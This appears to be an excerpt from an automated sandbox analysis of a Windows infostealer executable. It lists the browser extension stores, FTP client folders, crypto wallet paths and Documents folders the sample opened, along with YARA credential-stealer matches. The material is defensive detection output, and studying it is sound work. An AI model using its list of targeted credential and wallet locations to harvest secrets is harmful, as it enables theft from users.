Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: number of queries: 1770
Yara detected Credential Stealer
Source: Yara match File source: 0000000B.00000003.2620037561.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2785733963.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2604132730.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2664262344.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2663928952.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2603773117.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2623464968.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2636516772.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
